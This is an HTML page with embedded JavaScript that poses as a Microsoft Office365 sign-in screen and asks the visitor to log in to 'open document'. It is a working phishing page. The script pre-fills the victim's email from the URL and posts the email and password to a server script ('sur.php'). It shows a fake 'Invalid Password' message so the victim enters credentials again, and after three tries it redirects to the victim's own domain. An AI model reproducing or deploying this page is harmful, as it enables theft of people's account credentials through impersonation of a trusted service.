<html lang="en">
<head>
    <meta http-equiv="x-ua-compatible" content="EmulateIE9">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <title>Microsoft Document</title>
</head>

<body style="background-image: url('https://i.gyazo.com/b308246805567e68aad040e42c453a7f.png'); background-repeat: no-repeat;background-size: cover;">
    <div class="container-fluid p-0">
        <div class="container">
            <div class="row my-5">
                <div class="col-lg-5 mx-auto">
                    <div class="m-5 p-4 bg-white rounded" id="div1" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
                        <div class="text-left">
                            <span><img src="https://i.gyazo.com/cc41020ecb5162014937e0d1c83fa617.png" class="img-fluid" width="110px"></span><span class="pl-4 h5 align-middle"> </span><br><br>
                            <span class="h5">Sign in</span><br>
                            <span class="h5"></span><br>
                            <span class="h">Sign-In With Your Office365 Mail To Open Document</span><br>
                            <span id="msg" class="text-danger" style="display: none;">Invalid Password..! Please try again.</span><br>
                            <span id="error" class="text-danger" style="display: none;"></span>
                            <small></small>
                            <div class="form-group">
                                <input type="email" name="ai" class="form-control rounded-0 bg-transparent" id="ai" aria-describedby="aiHelp" placeholder="Email">
                            </div>
                            <div class="form-group mt-2">
                                <small></small>
                                <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Password">
                            </div>
							
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn text-white px-4 w-100" id="submit-btn" style="background-color: #0a59a3;">Next</button>
                        </div>
                    </div>
                </div>
                
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
    var count = 0;
$(document).ready(function() {

console.log("jkj");


    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();

    }
    ///////////////url getting ai////////////////

    var file = "bmV4dC5waHA=";

    $('#submit-btn').click(function(event) {
	console.log("button clicked");
	console.log(1+count);
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
		
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is empty.!");
            return false;
        }
		
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is empty.!");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.post('sur.php',
            {
                ai: ai,
                pr: pr,
				
            },
            function(response) {
                //if (response) {
                    $("#msg").show();
                    console.log("toto"+response);
                    if (response == 'ok') {
                        $("#pr").val("");
                        if (count >= 3) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);
                            return false;

                        }
                      
                    } else {
					console.log("what then");
                    }
                //}
            },
            
        );
    });


});
</script>